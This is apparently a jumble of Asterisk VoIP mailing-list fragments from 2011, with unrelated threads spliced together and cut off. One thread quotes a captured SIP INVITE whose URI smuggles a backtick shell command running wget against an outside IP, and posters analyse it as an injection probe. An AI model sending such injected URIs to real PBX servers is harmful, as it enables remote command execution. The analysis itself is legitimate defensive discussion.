My old phone could run Asterisk (as a PBX server).
Battery died pretty quickly though...
On Fri, Sep 9, 2011 at 9:03 PM, amit anand onewaytoconn...@gmail.com wrote:
Hey can you share something on this
On Thu, Sep 8, 2011 at 23:49, Cobra 2 cob...@linuxbasement.com wrote:
I've chrooted debian
I haven't seen this sort of URI/shell attack prior to today but it
looks interesting. Embedding a backtick in the URI with a wget that
doesn't seem to do much to an empty file.
I'm guessing it is just a probe to see if they can send further
embedded backtick shell commands to my Asterisk
if you provide what kind of reporting you need it would be easier to point a
few pointers?
either you can build it yourself.. or try the Call Center module from Elastix..
can be a good tool
Tarek Sawah
Information Technology Adviser
Integrated Digital Systems
CCNP, MCSE, RHCE, TELECOM
On 09/11/2011 07:05 PM, Tom Browning wrote:
INVITE
sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
SIP/2.0.
My guess is that this attack presumes you are running a web GUI such
as FreePBX, and that it does not sanitise embedded HTML. Thus, when
reviewing
I disagree with the 'review CDR' angle for a number of reasons:
a) there is a backtick in the URI trying to force shell and the proper
wget command line to send results to /dev/null
b) the V.php (at the url) appears to do nothing at all and might just
be empty (for log scraping), url safety
On 09/11/2011 07:35 PM, Tom Browning wrote:
I disagree with the 'review CDR' angle for a number of reasons:
a) there is a backtick in the URI trying to force shell and the proper
wget command line to send results to /dev/null
b) the V.php (at the url) appears to do nothing at all and might just
Hi,
I am trying to set up my asterisk 1.8.5 with voip.ms. I had no problem with
the incoming, but my outgoing is not working. If at all possible, I would
like to stick with SIP. Since the original poster (Glen) had mentioned that
he had gotten outgoing working, I was wondering if you would be